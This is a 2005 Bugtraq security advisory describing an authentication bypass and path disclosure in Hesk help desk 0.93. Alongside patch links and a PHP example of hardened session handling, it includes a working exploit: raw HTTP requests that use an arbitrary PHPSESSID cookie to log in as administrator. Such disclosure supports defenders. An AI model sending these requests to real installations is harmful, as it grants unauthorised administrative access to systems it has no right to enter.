Date: 20 Sep 2005 04:50:16 -0000
From: os2a.bto@...il.com
To: bugtraq@...urityfocus.com
Subject: Hesk Session ID Validation Vulnerability


OS2A

Hesk Session ID Validation Vulnerability


OS2A ID: OS2A_1003

Status:
9/13/2005 Issue Discovered
9/14/2005 Reported to the vendor
9/18/2005 Patch Released
9/20/2005 Advisory Released

Class: Authentication Bypass
Severity: CRITICAL


Overview:
Hesk is a PHP based help desk software that runs with a MySQL database.
It allows setting up a ticket based support system (helpdesk) for websites.
Hesk versions 0.93 and prior are vulnerable to authentication bypass and path
disclosure vulnerabilities caused by improper validation of the HTTP
header. This vulnerability can be exploited to bypass the authentication
mechanism, and also to reveal system specific information.
 

Description:
Multiple vulnerabilities exist in the Hesk ticket based support system.

1. Authentication Bypass
   The 'PHPSESSID' Session ID parameter in the HTTP header is not properly
   validated. A malicious user can log in to the Administrator account by
   sending a random value in the 'PHPSESSID' parameter and posting it to
   admin.php. This Session ID can then be used to access the administrative
   control panel.

   This is similar to a previously reported vulnerability where an invalid
   User ID and Password were submitted. In this case, a randomly chosen
   Session ID is sent along with the login request.

2. Path Disclosure
   Path information is disclosed in error pages when invalid metacharacters
   such as "'" or "<" are passed in the 'PHPSESSID' field of the HTTP header.
   

Impact:
Successful exploitation can result in a compromise of the application and
disclosure of system specific information.

Affected Systems:
Hesk 0.93 and prior.
Linux (Any), Unix (Any), Windows (Any)

Exploit:
1. HTTP POST request with randomly chosen Session ID:
POST admin.php +
("Host: host_ip
  User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7) 
  Accept: text/xml,application/xml,application/xhtml+xml,text/html
  Accept-Language: en-us,en;q=0.5
  Accept-Encoding: gzip,deflate
  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  Keep-Alive: 300
  Connection: keep-alive
  Referer: http://host_ip/hesk/admin.php
  Cookie: PHPSESSID=12345                             <!-- Random Session ID -->
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 26
  user=1&pass=sdfd&a=do_login");
 
2. GET request to administrative control panel:
GET admin_main.php +
("Host: host_ip
  User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7) 
  Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain
  Accept-Language: en-us,en;q=0.5
  Accept-Encoding: gzip,deflate
  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  Keep-Alive: 300
  Connection: keep-alive
  Cookie: PHPSESSID=12345")                            <!-- Session ID -->

Solutions:
	Patch: 
	http://www.phpjunkyard.com/extras/hesk_0931_patch.zip
	OR Hesk 0.93.1 from
	http://www.phpjunkyard.com/free-helpdesk-software.php
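The vendor patch above is the fix for Hesk itself. As an added illustration that is not Hesk's code and is not taken from the patch, the following PHP shows the session-handling pattern that closes both issues described in this advisory, on the assumption that the bypass comes from an admin check that trusts the presence of a client-supplied session identifier rather than a server-side flag set only after credential verification. check_credentials() is a hypothetical helper assumed to exist elsewhere in the application.

```php
<?php
// Added example (not Hesk's code): hardened session handling for an admin login.
// Assumption: check_credentials($user, $pass) is a hypothetical helper that
// returns true only for a valid account.

// 1. Refuse to adopt session IDs that PHP did not issue. With strict mode an
//    unknown PHPSESSID value (for example "12345") is replaced by a freshly
//    generated ID instead of being accepted as-is.
ini_set('session.use_strict_mode', '1');
ini_set('session.use_only_cookies', '1');
ini_set('session.cookie_httponly', '1');

// 2. Never render PHP errors (and with them filesystem paths) to the browser;
//    log them server-side instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// 3. Check the cookie's format before session_start() so metacharacters such
//    as "'" or "<" never reach the session handler or an error message.
function valid_session_id_format(string $sid): bool
{
    // PHP's own session IDs are alphanumeric (plus ',' and '-' in some
    // configurations); anything outside that set is discarded.
    return (bool) preg_match('/^[A-Za-z0-9,-]{22,128}$/', $sid);
}

if (isset($_COOKIE['PHPSESSID']) && !valid_session_id_format($_COOKIE['PHPSESSID'])) {
    // Drop the malformed value so session_start() issues a new ID, and tell
    // the client to forget the bad cookie.
    unset($_COOKIE['PHPSESSID']);
    setcookie('PHPSESSID', '', time() - 3600, '/');
}
session_start();

// 4. Login: the "logged in" state is recorded server-side only after the
//    credentials pass, and the session ID is regenerated so an ID the client
//    chose before authenticating is never promoted to an admin session.
function do_login(string $user, string $pass): bool
{
    if (!check_credentials($user, $pass)) {   // hypothetical helper
        return false;
    }
    session_regenerate_id(true);
    $_SESSION['admin_authenticated'] = true;
    $_SESSION['admin_user'] = $user;
    return true;
}

// 5. Gate for admin_main.php and every other administrative page: the mere
//    presence of a session ID proves nothing; only the server-side flag does.
function require_admin(): void
{
    if (empty($_SESSION['admin_authenticated'])) {
        header('Location: admin.php');
        exit;
    }
}
```

The important property is that nothing the client sends (a cookie value, a form field) can set `admin_authenticated`; it is written only by `do_login()` after `check_credentials()` succeeds, and every admin page calls `require_admin()` before doing any work. Strict mode and the format check together mean that a guessed or malformed PHPSESSID is discarded at `session_start()` rather than echoed into an error page or bound to privileged state.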

Credits:
Rajesh Sethumadhavan, Rahul Mohandas, and Jayesh K.S of OS2A discovered
the vulnerability.

